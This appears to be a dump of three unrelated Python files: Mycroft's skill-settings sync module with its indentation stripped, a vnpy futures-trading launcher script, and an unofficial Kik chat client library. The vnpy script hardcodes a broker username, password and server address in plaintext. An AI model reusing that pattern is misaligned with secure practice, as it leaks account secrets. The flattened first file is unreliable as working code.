# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
SkillSettings is a simple extension of a Python dict which enables
simplified storage of settings. Values stored into the dict will
automatically persist locally. Additionally, it can interact with
a backend system to provide a GUI interface for some or all of the
settings.
The GUI for the setting is described by a file in the skill's root
directory called settingsmeta.json (or settingsmeta.yaml, if you
prefer working with yaml). The "name" associates the user-interface
field with the setting name in the dictionary. For example, you
might have a setting['username']. In the settingsmeta you can
describe the interface you want to edit that value with:
...
"fields": [
{
"name": "username",
"type": "email",
"label": "Email address to associate",
"placeholder": "example@mail.com",
"value": ""
}]
...
When the user changes the setting via the web UI, it will be sent
down to all the devices and automatically placed into the
settings['username']. Any local changes made to the value (e.g.
via a verbal interaction) will also be synched to the server to show
on the web interface.
NOTE: As it stands today, this functions seamlessly with a single
device. With multiple devices there are a few hitches that are being
worked out. The first device where a skill is installed creates the
setting and values are sent down to any other devices that install the
same skill. However only the original device can make changes locally
for synching to the web. This limitation is temporary and will be
removed soon.
Usage Example:
from mycroft.skill.settings import SkillSettings
s = SkillSettings('./settings.json', 'ImportantSettings')
s['meaning of life'] = 42
s['flower pot sayings'] = 'Not again...'
s.store() # This happens automagically in a MycroftSkill
"""
import json
import hashlib
import os
import time
import copy
import re
from threading import Timer, Thread
from os.path import isfile, join, expanduser
from requests.exceptions import RequestException, HTTPError
from msm import SkillEntry
from mycroft.api import DeviceApi, is_paired
from mycroft.util.log import LOG
from mycroft.util import camel_case_split
from mycroft.configuration import ConfigurationManager
from .msm_wrapper import create_msm
msm = None
msm_creation_time = 0
def build_global_id(directory, config):
""" Create global id for the skill.
TODO: Handle dirty skill
Arguments:
directory: skill directory
config: config for the device to fetch msm setup
"""
# Update the msm object if it's more than an hour old
global msm
global msm_creation_time
if msm is None or time.time() - msm_creation_time > 60 * 60:
msm_creation_time = time.time()
msm = create_msm(config)
s = SkillEntry.from_folder(directory, msm)
# If modified prepend the device uuid
return s.skill_gid, s.meta_info.get('display_name')
def display_name(name):
""" Splits camelcase and removes leading/trailing Skill. """
name = re.sub(r'(^[Ss]kill|[Ss]kill$)', '', name)
return camel_case_split(name)
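# For example (illustrative only): display_name('FooBarSkill') strips the
# trailing 'Skill' and splits the camel case, yielding 'Foo Bar'.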
class DelayRequest(Exception):
""" Indicate that the next request should be delayed. """
pass
class SkillSettings(dict):
""" Dictionary that can easily be saved to a file, serialized as json. It
also syncs to the backend for skill settings
Args:
directory (str): Path to storage directory
name (str): user readable name associated with the settings
"""
def __init__(self, directory, name):
super(SkillSettings, self).__init__()
# when skills try to instantiate settings
# in __init__, it can erase the settings saved
# on disk (settings.json). So this prevents that
# This is set to true in core.py after skill init
self.allow_overwrite = False
self.api = DeviceApi()
self.config = ConfigurationManager.get()
self.name = name
# set file paths
self._settings_path = join(directory, 'settings.json')
self._meta_path = _get_meta_path(directory)
self._directory = directory
self.is_alive = True
self.loaded_hash = hash(json.dumps(self, sort_keys=True))
        self._complete_initialization = False
self._device_identity = None
self._api_path = None
self._user_identity = None
self.changed_callback = None
self._poll_timer = None
self._blank_poll_timer = None
self._is_alive = True
# Add Information extracted from the skills-meta.json entry for the
# skill.
skill_gid, disp_name = build_global_id(self._directory, self.config)
self.__skill_gid = skill_gid
self.display_name = disp_name
# if settingsmeta exist
if self._meta_path:
t = Thread(target=self._poll_skill_settings)
t.daemon = True
t.start()
        # if not disallowed by the user, upload an entry for all installed skills
elif self.config['skills']['upload_skill_manifest']:
self._blank_poll_timer = Timer(1, self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
@property
def skill_gid(self):
""" Finalizes the skill gid to include device uuid if needed. """
if is_paired():
return self.__skill_gid.replace('@|', '@{}|'.format(
DeviceApi().identity.uuid))
else:
return self.__skill_gid
def __hash__(self):
""" Simple object unique hash. """
return hash(str(id(self)) + self.name)
def run_poll(self, _=None):
"""Immediately poll the web for new skill settings"""
if self._poll_timer:
self._poll_timer.cancel()
self._poll_skill_settings()
def stop_polling(self):
self._is_alive = False
if self._poll_timer:
self._poll_timer.cancel()
if self._blank_poll_timer:
self._blank_poll_timer.cancel()
def set_changed_callback(self, callback):
""" Set callback to perform when server settings have changed.
Args:
callback: function/method to call when settings have changed
"""
self.changed_callback = callback
# TODO: break this up into two classes
def initialize_remote_settings(self):
""" initializes the remote settings to the server """
# if the settingsmeta file exists (and is valid)
# this block of code is a control flow for
# different scenarios that may arises with settingsmeta
self.load_skill_settings_from_file() # loads existing settings.json
settings_meta = self._load_settings_meta()
if not settings_meta:
return
if not is_paired():
return
self._device_identity = self.api.identity.uuid
self._api_path = "/" + self._device_identity + "/skill"
try:
self._user_identity = self.api.get()['user']['uuid']
except RequestException:
return
settings = self._request_my_settings(self.skill_gid)
if settings:
self.save_skill_settings(settings)
# TODO if this skill_gid is not a modified version check if a modified
# version exists on the server and delete it
# Always try to upload settingsmeta on startup
self._upload_meta(settings_meta, self.skill_gid)
        self._complete_initialization = True
@property
def _is_stored(self):
return hash(json.dumps(self, sort_keys=True)) == self.loaded_hash
def __getitem__(self, key):
""" Get key """
return super(SkillSettings, self).__getitem__(key)
def __setitem__(self, key, value):
""" Add/Update key. """
if self.allow_overwrite or key not in self:
return super(SkillSettings, self).__setitem__(key, value)
def _load_settings_meta(self):
""" Load settings metadata from the skill folder.
If no settingsmeta exists a basic settingsmeta will be created
containing a basic identifier.
Returns:
(dict) settings meta
"""
        # Imported here to handle an issue with the readthedocs build
import yaml
if self._meta_path and os.path.isfile(self._meta_path):
_, ext = os.path.splitext(self._meta_path)
            json_file = ext.lower() == ".json"
try:
with open(self._meta_path, encoding='utf-8') as f:
if json_file:
data = json.load(f)
else:
data = yaml.safe_load(f)
except Exception as e:
LOG.error("Failed to load setting file: " + self._meta_path)
LOG.error(repr(e))
data = {}
else:
data = {}
# Insert skill_gid and display_name
data['skill_gid'] = self.skill_gid
data['display_name'] = (self.display_name or data.get('name') or
display_name(self.name))
# Backwards compatibility:
if 'name' not in data:
data['name'] = data['display_name']
return data
def _send_settings_meta(self, settings_meta):
""" Send settingsmeta to the server.
Args:
settings_meta (dict): dictionary of the current settings meta
Returns:
dict: uuid, a unique id for the setting meta data
"""
try:
uuid = self.api.upload_skill_metadata(
self._type_cast(settings_meta, to_platform='web'))
return uuid
except HTTPError as e:
if e.response.status_code in [422, 500, 501]:
LOG.info(e.response.status_code)
raise DelayRequest
else:
LOG.error(e)
return None
except Exception as e:
LOG.error(e)
return None
def save_skill_settings(self, skill_settings):
""" Takes skill object and save onto self
Args:
skill_settings (dict): skill
"""
if 'skillMetadata' in skill_settings:
sections = skill_settings['skillMetadata']['sections']
for section in sections:
for field in section["fields"]:
if "name" in field and "value" in field:
# Bypass the change lock to allow server to update
# during skill init
super(SkillSettings, self).__setitem__(field['name'],
field['value'])
self.store()
def _migrate_settings(self, settings_meta):
""" sync settings.json and settingsmeta in memory """
meta = settings_meta.copy()
if 'skillMetadata' not in meta:
return meta
self.load_skill_settings_from_file()
sections = meta['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section['fields']):
if 'name' in field:
if field["name"] in self:
sections[i]['fields'][j]['value'] = \
str(self.__getitem__(field['name']))
meta['skillMetadata']['sections'] = sections
return meta
def _upload_meta(self, settings_meta, identifier):
""" uploads the new meta data to settings with settings migration
Args:
settings_meta (dict): settingsmeta.json or settingsmeta.yaml
identifier (str): identifier for skills meta data
"""
LOG.debug('Uploading settings meta for {}'.format(identifier))
meta = self._migrate_settings(settings_meta)
meta['identifier'] = identifier
        self._send_settings_meta(meta)
def hash(self, string):
""" md5 hasher for consistency across cpu architectures """
return hashlib.md5(bytes(string, 'utf-8')).hexdigest()
def update_remote(self):
""" update settings state from server """
settings_meta = self._load_settings_meta()
if settings_meta is None:
return
# Get settings
skills_settings = self._request_my_settings(self.skill_gid)
if skills_settings is not None:
self.save_skill_settings(skills_settings)
else:
LOG.debug("No Settings on server for {}".format(self.skill_gid))
# Settings meta doesn't exist on server push them
settings_meta = self._load_settings_meta()
self._upload_meta(settings_meta, self.skill_gid)
def _init_blank_meta(self):
""" Send blank settingsmeta to remote. """
try:
if not is_paired() and self.is_alive:
self._blank_poll_timer = Timer(60, self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
else:
self.initialize_remote_settings()
except DelayRequest:
# Delay 5 minutes and retry
self._blank_poll_timer = Timer(60 * 5,
self._init_blank_meta)
self._blank_poll_timer.daemon = True
self._blank_poll_timer.start()
except Exception as e:
LOG.exception('Failed to send blank meta: {}'.format(repr(e)))
def _poll_skill_settings(self):
""" If identifier exists for this skill poll to backend to
request settings and store it if it changes
TODO: implement as websocket
"""
delay = 1
original = hash(str(self))
try:
if not is_paired():
pass
            elif not self._complete_initialization:
self.initialize_remote_settings()
else:
self.update_remote()
except DelayRequest:
LOG.info('{}: Delaying next settings fetch'.format(self.name))
delay = 5
except Exception as e:
LOG.exception('Failed to fetch skill settings: {}'.format(repr(e)))
finally:
# Call callback for updated settings
            if self._complete_initialization:
if self.changed_callback and hash(str(self)) != original:
self.changed_callback()
if self._poll_timer:
self._poll_timer.cancel()
if not self._is_alive:
return
# continues to poll settings every minute
self._poll_timer = Timer(delay * 60, self._poll_skill_settings)
self._poll_timer.daemon = True
self._poll_timer.start()
def load_skill_settings_from_file(self):
""" If settings.json exist, open and read stored values into self """
if isfile(self._settings_path):
with open(self._settings_path) as f:
try:
json_data = json.load(f)
for key in json_data:
self[key] = json_data[key]
except Exception as e:
# TODO: Show error on webUI. Dev will have to fix
# metadata to be able to edit later.
LOG.error(e)
def _type_cast(self, settings_meta, to_platform):
""" Tranform data type to be compatible with Home and/or Core.
e.g.
Web to core
"true" => True, "1.4" => 1.4
core to Web
False => "false'
Args:
settings_meta (dict): skills object
to_platform (str): platform to convert
compatible data types to
Returns:
dict: skills object
"""
meta = settings_meta.copy()
if 'skillMetadata' not in settings_meta:
return meta
sections = meta['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section.get('fields', [])):
_type = field.get('type')
if _type == 'checkbox':
value = field.get('value')
if to_platform == 'web':
if value is True or value == 'True':
sections[i]['fields'][j]['value'] = 'true'
elif value is False or value == 'False':
sections[i]['fields'][j]['value'] = 'false'
elif to_platform == 'core':
if value == 'true' or value == 'True':
sections[i]['fields'][j]['value'] = True
elif value == 'false' or value == 'False':
sections[i]['fields'][j]['value'] = False
elif _type == 'number':
value = field.get('value')
if to_platform == 'core':
if "." in value:
sections[i]['fields'][j]['value'] = float(value)
else:
sections[i]['fields'][j]['value'] = int(value)
elif to_platform == 'web':
sections[i]['fields'][j]['value'] = str(value)
meta['skillMetadata']['sections'] = sections
return meta
def _request_my_settings(self, identifier):
""" Get skill settings for this device associated
with the identifier
Args:
identifier (str): a hashed_meta
Returns:
            skill_settings (dict or None): returns a dict if a match is found
"""
settings = self._request_settings()
if settings:
# this loads the settings into memory for use in self.store
for skill_settings in settings:
if skill_settings['identifier'] == identifier:
LOG.debug("Fetched settings for {}".format(identifier))
skill_settings = \
self._type_cast(skill_settings, to_platform='core')
self._remote_settings = skill_settings
return skill_settings
return None
def _request_settings(self):
""" Get all skill settings for this device from server.
Returns:
dict: dictionary with settings collected from the server.
"""
try:
settings = self.api.get_skill_settings()
except RequestException:
return None
settings = [skills for skills in settings if skills is not None]
return settings
@property
def _should_upload_from_change(self):
changed = False
if (hasattr(self, '_remote_settings') and
'skillMetadata' in self._remote_settings):
sections = self._remote_settings['skillMetadata']['sections']
for i, section in enumerate(sections):
for j, field in enumerate(section['fields']):
if 'name' in field:
# Ensure that the field exists in settings and that
# it has a value to compare
if (field["name"] in self and
'value' in sections[i]['fields'][j]):
remote_val = sections[i]['fields'][j]["value"]
self_val = self.get(field['name'])
if str(remote_val) != str(self_val):
changed = True
if self.get('not_owner'):
changed = False
return changed
def store(self, force=False):
""" Store dictionary to file if a change has occured.
Args:
force: Force write despite no change
"""
if force or not self._is_stored:
with open(self._settings_path, 'w') as f:
json.dump(self, f)
self.loaded_hash = hash(json.dumps(self, sort_keys=True))
if self._should_upload_from_change:
settings_meta = self._load_settings_meta()
self._upload_meta(settings_meta, self.skill_gid)
def _get_meta_path(base_directory):
json_path = join(base_directory, 'settingsmeta.json')
yaml_path = join(base_directory, 'settingsmeta.yaml')
if isfile(json_path):
return json_path
if isfile(yaml_path):
return yaml_path
return None
|
noui.py
|
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.app.data_recorder import DataRecorderApp
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
ctp_setting = {
"用户名": "107462",
"密码": "110120",
"经纪商代码": "9999",
"交易服务器": "tcp://180.168.146.187:10101",
"行情服务器": "tcp://180.168.146.187:10111",
"产品名称": "simnow_client_test",
"授权编码": "0000000000000000",
"产品信息": ""
}
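# Key translations (the Chinese keys are required verbatim by the CTP
# gateway): 用户名 = username, 密码 = password, 经纪商代码 = broker ID,
# 交易服务器 = trade server address, 行情服务器 = market data server address,
# 产品名称 = product name, 授权编码 = authorization code, 产品信息 = product info.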
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.write_log("主引擎创建成功")
main_engine.add_app(DataRecorderApp)
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(ctp_setting, "CTP")
main_engine.write_log("连接CTP接口")
#sleep(10)
cta_engine.init_engine()
main_engine.write_log("CTA策略初始化完成")
cta_engine.init_all_strategies()
#sleep(60) # Leave enough time to complete strategy initialization
main_engine.write_log("CTA策略全部初始化")
cta_engine.start_all_strategies()
main_engine.write_log("CTA策略全部启动")
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(15, 30)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
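            # For example, 21:00 satisfies current_time >= NIGHT_START and
            # 01:30 satisfies current_time <= NIGHT_END, so both fall inside
            # the night session even though the window crosses midnight.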
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# 非记录时间则退出子进程
if not trading and child_process is not None:
print("关闭子进程")
child_process.terminate()
child_process.join()
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
client.py
|
import asyncio
import logging
import sys
import time
from threading import Thread, Event
from typing import Union, List, Tuple
from asyncio import Transport, Protocol
from bs4 import BeautifulSoup
import kik_unofficial.callbacks as callbacks
import kik_unofficial.datatypes.exceptions as exceptions
import kik_unofficial.datatypes.xmpp.chatting as chatting
import kik_unofficial.datatypes.xmpp.group_adminship as group_adminship
import kik_unofficial.datatypes.xmpp.login as login
import kik_unofficial.datatypes.xmpp.roster as roster
import kik_unofficial.datatypes.xmpp.sign_up as sign_up
import kik_unofficial.xmlns_handlers as xmlns_handlers
from kik_unofficial.datatypes.xmpp.auth_stanza import AuthStanza
from kik_unofficial.datatypes.xmpp import account, xiphias
from kik_unofficial.utilities.threading_utils import run_in_new_thread
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement
from kik_unofficial.http import profile_pictures, content
HOST, PORT = "talk1110an.kik.com", 5223
log = logging.getLogger('kik_unofficial')
class KikClient:
"""
    The main kik class, used to manage a kik connection and send commands
"""
def __init__(self, callback: callbacks.KikClientCallback, kik_username, kik_password,
kik_node=None, log_level=logging.INFO, device_id_override=None, android_id_override=None):
"""
Initializes a connection to Kik servers.
If you want to automatically login too, use the username and password parameters.
:param callback: a callback instance containing your callbacks implementation.
                         This way you'll get notified whenever certain events happen.
Look at the KikClientCallback class for more details
:param kik_username: the kik username or email to log in with.
:param kik_password: the kik password to log in with.
:param kik_node: the username plus 3 letters after the "_" and before the "@" in the JID. If you know it,
                         authentication will happen faster and without a login. Otherwise supply None.
:param log_level: logging level.
"""
self._set_up_logging(log_level)
self.username = kik_username
self.password = kik_password
self.kik_node = kik_node
self.kik_email = None
self.device_id_override = device_id_override
self.android_id_override = android_id_override
self.callback = callback
self.authenticator = AuthStanza(self)
self.connected = False
self.authenticated = False
self.connection = None
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self._known_users_information = set()
self._new_user_added_event = Event()
self.should_login_on_connection = kik_username is not None and kik_password is not None
self._connect()
def _connect(self):
"""
Runs the kik connection thread, which creates an encrypted (SSL based) TCP connection
to the kik servers.
"""
self.kik_connection_thread = Thread(target=self._kik_connection_thread_function, name="Kik Connection")
self.kik_connection_thread.start()
def _on_connection_made(self):
"""
Gets called when the TCP connection to kik's servers is done and we are connected.
Now we might initiate a login request or an auth request.
"""
if self.username is not None and self.password is not None and self.kik_node is not None:
# we have all required credentials, we can authenticate
log.info("[+] Establishing authenticated connection using kik node '{}'...".format(self.kik_node))
message = login.EstablishAuthenticatedSessionRequest(self.kik_node, self.username, self.password, self.device_id_override)
self.initial_connection_payload = message.serialize()
else:
self.initial_connection_payload = '<k anon="">'.encode()
self.connection.send_raw_data(self.initial_connection_payload)
def _establish_authenticated_session(self, kik_node):
"""
Updates the kik node and creates a new connection to kik servers.
This new connection will be initiated with another payload which proves
we have the credentials for a specific user. This is how authentication is done.
:param kik_node: The user's kik node (everything before '@' in JID).
"""
self.kik_node = kik_node
log.info("[+] Closing current connection and creating a new authenticated one.")
self.disconnect()
self._connect()
def login(self, username, password, captcha_result=None):
"""
Sends a login request with the given kik username and password
:param username: Your kik username or email
:param password: Your kik password
:param captcha_result: If this parameter is provided, it is the answer to the captcha given in the previous
login attempt.
"""
self.username = username
self.password = password
login_request = login.LoginRequest(username, password, captcha_result, self.device_id_override, self.android_id_override)
login_type = "email" if '@' in self.username else "username"
log.info("[+] Logging in with {} '{}' and a given password {}..."
.format(login_type, username, '*' * len(password)))
return self._send_xmpp_element(login_request)
def register(self, email, username, password, first_name, last_name, birthday="1974-11-20", captcha_result=None):
"""
Sends a register request to sign up a new user to kik with the given details.
"""
self.username = username
self.password = password
register_message = sign_up.RegisterRequest(email, username, password, first_name, last_name, birthday, captcha_result,
self.device_id_override, self.android_id_override)
log.info("[+] Sending sign up request (name: {} {}, email: {})...".format(first_name, last_name, email))
return self._send_xmpp_element(register_message)
def request_roster(self, is_big=True, timestamp=None):
"""
Requests the list of chat partners (people and groups). This is called roster in XMPP terms.
"""
log.info("[+] Requesting roster (list of chat partners)...")
return self._send_xmpp_element(roster.FetchRosterRequest(is_big=is_big, timestamp=timestamp))
# -------------------------------
# Common Messaging Operations
# -------------------------------
def send_chat_message(self, peer_jid: str, message: str, bot_mention_jid=None):
"""
Sends a text chat message to another person or a group with the given JID/username.
:param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com)
If you don't know the JID of someone, you can also specify a kik username here.
:param message: The actual message body
:param bot_mention_jid: If an official bot is referenced, their jid must be embedded as mention for them
to respond.
"""
peer_jid = self.get_jid(peer_jid)
if self.is_group_jid(peer_jid):
log.info("[+] Sending chat message '{}' to group '{}'...".format(message, peer_jid))
return self._send_xmpp_element(chatting.OutgoingGroupChatMessage(peer_jid, message, bot_mention_jid))
else:
log.info("[+] Sending chat message '{}' to user '{}'...".format(message, peer_jid))
return self._send_xmpp_element(chatting.OutgoingChatMessage(peer_jid, message, False, bot_mention_jid))
def send_chat_image(self, peer_jid: str, file, forward=True):
"""
Sends an image chat message to another person or a group with the given JID/username.
:param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com)
If you don't know the JID of someone, you can also specify a kik username here.
:param file: The path to the image file OR its bytes OR an IOBase object to send.
"""
peer_jid = self.get_jid(peer_jid)
if self.is_group_jid(peer_jid):
log.info("[+] Sending chat image to group '{}'...".format(peer_jid))
imageRequest = chatting.OutgoingGroupChatImage(peer_jid, file, forward)
else:
log.info("[+] Sending chat image to user '{}'...".format(peer_jid))
imageRequest = chatting.OutgoingChatImage(peer_jid, file, False, forward)
content.upload_gallery_image(imageRequest, self.kik_node + '@talk.kik.com', self.username, self.password)
return self._send_xmpp_element(imageRequest)
def send_read_receipt(self, peer_jid: str, receipt_message_id: str, group_jid=None):
"""
Sends a read receipt for a previously sent message, to a specific user or group.
:param peer_jid: The JID of the user to which to send the receipt.
:param receipt_message_id: The message ID that the receipt is sent for
        :param group_jid: If the receipt is sent for a message that was sent in a group,
this parameter should contain the group's JID
"""
log.info("[+] Sending read receipt to JID {} for message ID {}".format(peer_jid, receipt_message_id))
return self._send_xmpp_element(chatting.OutgoingReadReceipt(peer_jid, receipt_message_id, group_jid))
def send_delivered_receipt(self, peer_jid: str, receipt_message_id: str):
"""
Sends a receipt indicating that a specific message was received, to another person.
        :param peer_jid: The other peer's JID to send the receipt to
:param receipt_message_id: The message ID for which to generate the receipt
"""
log.info("[+] Sending delivered receipt to JID {} for message ID {}".format(peer_jid, receipt_message_id))
return self._send_xmpp_element(chatting.OutgoingDeliveredReceipt(peer_jid, receipt_message_id))
def send_is_typing(self, peer_jid: str, is_typing: bool):
"""
Updates the 'is typing' status of the bot during a conversation.
:param peer_jid: The JID that the notification will be sent to
:param is_typing: If true, indicates that we're currently typing, or False otherwise.
"""
if self.is_group_jid(peer_jid):
return self._send_xmpp_element(chatting.OutgoingGroupIsTypingEvent(peer_jid, is_typing))
else:
return self._send_xmpp_element(chatting.OutgoingIsTypingEvent(peer_jid, is_typing))
def send_gif_image(self, peer_jid: str, search_term):
"""
Sends a GIF image to another person or a group with the given JID/username.
        The GIF is taken from tenor.com, based on search keywords.
        :param peer_jid: The Jabber ID for which to send the message (looks like username_ejs@talk.kik.com)
        :param search_term: The search term to use when searching GIF images on tenor.com
"""
if self.is_group_jid(peer_jid):
log.info("[+] Sending a GIF message to group '{}'...".format(peer_jid))
return self._send_xmpp_element(chatting.OutgoingGIFMessage(peer_jid, search_term, True))
else:
log.info("[+] Sending a GIF message to user '{}'...".format(peer_jid))
return self._send_xmpp_element(chatting.OutgoingGIFMessage(peer_jid, search_term, False))
def request_info_of_users(self, peer_jids: Union[str, List[str]]):
"""
Requests basic information (username, JID, display name, picture) of some users.
When the information arrives, the callback on_peer_info_received() will fire.
:param peer_jids: The JID(s) or the username(s) for which to request the information.
If you want to request information for more than one user, supply a list of strings.
Otherwise, supply a string
"""
return self._send_xmpp_element(roster.QueryUsersInfoRequest(peer_jids))
def add_friend(self, peer_jid):
return self._send_xmpp_element(roster.AddFriendRequest(peer_jid))
def remove_friend(self, peer_jid):
return self._send_xmpp_element(roster.RemoveFriendRequest(peer_jid))
def send_link(self, peer_jid, link, title, text='', app_name='Webpage'):
return self._send_xmpp_element(chatting.OutgoingLinkShareEvent(peer_jid, link, title, text, app_name))
def xiphias_get_users(self, peer_jids: Union[str, List[str]]):
"""
Calls the new format xiphias message to request user data such as profile creation date
and background picture URL.
:param peer_jids: one jid, or a list of jids
"""
return self._send_xmpp_element(xiphias.UsersRequest(peer_jids))
def xiphias_get_users_by_alias(self, alias_jids: Union[str, List[str]]):
"""
Like xiphias_get_users, but for aliases instead of jids.
:param alias_jids: one jid, or a list of jids
"""
return self._send_xmpp_element(xiphias.UsersByAliasRequest(alias_jids))
# --------------------------
# Group Admin Operations
# -------------------------
def change_group_name(self, group_jid: str, new_name: str):
"""
        Changes a group's name to something new
:param group_jid: The JID of the group whose name should be changed
:param new_name: The new name to give to the group
"""
log.info("[+] Requesting a group name change for JID {} to '{}'".format(group_jid, new_name))
return self._send_xmpp_element(group_adminship.ChangeGroupNameRequest(group_jid, new_name))
def add_peer_to_group(self, group_jid, peer_jid):
"""
Adds someone to a group
:param group_jid: The JID of the group into which to add a user
:param peer_jid: The JID of the user to add
"""
log.info("[+] Requesting to add user {} into the group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.AddToGroupRequest(group_jid, peer_jid))
def remove_peer_from_group(self, group_jid, peer_jid):
"""
Kicks someone out of a group
:param group_jid: The group JID from which to remove the user
:param peer_jid: The JID of the user to remove
"""
log.info("[+] Requesting removal of user {} from group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.RemoveFromGroupRequest(group_jid, peer_jid))
def ban_member_from_group(self, group_jid, peer_jid):
"""
Bans a member from the group
:param group_jid: The JID of the relevant group
:param peer_jid: The JID of the user to ban
"""
log.info("[+] Requesting ban of user {} from group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.BanMemberRequest(group_jid, peer_jid))
def unban_member_from_group(self, group_jid, peer_jid):
"""
        Undoes a ban of someone from a group
        :param group_jid: The JID of the relevant group
        :param peer_jid: The JID of the user to un-ban from the group
"""
log.info("[+] Requesting un-banning of user {} from the group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.UnbanRequest(group_jid, peer_jid))
def join_group_with_token(self, group_hashtag, group_jid, join_token):
"""
Tries to join into a specific group, using a cryptographic token that was received earlier from a search
:param group_hashtag: The public hashtag of the group into which to join (like '#Music')
:param group_jid: The JID of the same group
:param join_token: a token that can be extracted in the callback on_group_search_response, after calling
search_group()
"""
log.info("[+] Trying to join the group '{}' with JID {}".format(group_hashtag, group_jid))
return self._send_xmpp_element(roster.GroupJoinRequest(group_hashtag, join_token, group_jid))
def leave_group(self, group_jid):
"""
Leaves a specific group
:param group_jid: The JID of the group to leave
"""
log.info("[+] Leaving group {}".format(group_jid))
return self._send_xmpp_element(group_adminship.LeaveGroupRequest(group_jid))
def promote_to_admin(self, group_jid, peer_jid):
"""
Turns some group member into an admin
:param group_jid: The group JID for which the member will become an admin
:param peer_jid: The JID of user to turn into an admin
"""
log.info("[+] Promoting user {} to admin in group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.PromoteToAdminRequest(group_jid, peer_jid))
def demote_admin(self, group_jid, peer_jid):
"""
        Turns an admin of a group into a regular user with no adminship capabilities.
:param group_jid: The group JID in which the rights apply
:param peer_jid: The admin user to demote
:return:
"""
log.info("[+] Demoting user {} to a regular member in group {}".format(peer_jid, group_jid))
return self._send_xmpp_element(group_adminship.DemoteAdminRequest(group_jid, peer_jid))
def add_members(self, group_jid, peer_jids: Union[str, List[str]]):
"""
Adds multiple users to a specific group at once
:param group_jid: The group into which to join the users
:param peer_jids: a list (or a single string) of JIDs to add to the group
"""
log.info("[+] Adding some members to the group {}".format(group_jid))
return self._send_xmpp_element(group_adminship.AddMembersRequest(group_jid, peer_jids))
# ----------------------
# Other Operations
# ----------------------
def search_group(self, search_query):
"""
Searches for public groups using a query
Results will be returned using the on_group_search_response() callback
:param search_query: The query that contains some of the desired groups' name.
"""
log.info("[+] Initiating a search for groups using the query '{}'".format(search_query))
return self._send_xmpp_element(roster.GroupSearchRequest(search_query))
def check_username_uniqueness(self, username):
"""
Checks if the given username is available for registration.
Results are returned in the on_username_uniqueness_received() callback
:param username: The username to check for its existence
"""
log.info("[+] Checking for Uniqueness of username '{}'".format(username))
return self._send_xmpp_element(sign_up.CheckUsernameUniquenessRequest(username))
def set_profile_picture(self, filename):
"""
Sets the profile picture of the current user
:param filename: The path to the file OR its bytes OR an IOBase object to set
"""
log.info("[+] Setting the profile picture to file '{}'".format(filename))
profile_pictures.set_profile_picture(filename, self.kik_node + '@talk.kik.com', self.username, self.password)
def set_background_picture(self, filename):
"""
Sets the background picture of the current user
:param filename: The path to the image file OR its bytes OR an IOBase object to set
"""
log.info("[+] Setting the background picture to filename '{}'".format(filename))
profile_pictures.set_background_picture(filename, self.kik_node + '@talk.kik.com', self.username, self.password)
def send_captcha_result(self, stc_id, captcha_result):
"""
In case a captcha was encountered, solves it using an element ID and a response parameter.
The stc_id can be extracted from a CaptchaElement, and the captcha result needs to be extracted manually with
a browser. Please see solve_captcha_wizard() for the steps needed to solve the captcha
:param stc_id: The stc_id from the CaptchaElement that was encountered
:param captcha_result: The answer to the captcha (which was generated after solved by a human)
"""
log.info("[+] Trying to solve a captcha with result: '{}'".format(captcha_result))
return self._send_xmpp_element(login.CaptchaSolveRequest(stc_id, captcha_result))
def change_display_name(self, first_name, last_name):
"""
Changes the display name
:param first_name: The first name
:param last_name: The last name
"""
log.info("[+] Changing the display name to '{} {}'".format(first_name, last_name))
return self._send_xmpp_element(account.ChangeNameRequest(first_name, last_name))
def change_password(self, new_password, email):
"""
Changes the login password
:param new_password: The new login password to set for the account
:param email: The current email of the account
"""
log.info("[+] Changing the password of the account")
return self._send_xmpp_element(account.ChangePasswordRequest(self.password, new_password, email, self.username))
def change_email(self, old_email, new_email):
"""
Changes the email of the current account
:param old_email: The current email
:param new_email: The new email to set
"""
log.info("[+] Changing account email to '{}'".format(new_email))
return self._send_xmpp_element(account.ChangeEmailRequest(self.password, old_email, new_email))
def disconnect(self):
"""
Closes the connection to kik's servers.
"""
log.info("[!] Disconnecting.")
self.connection.close()
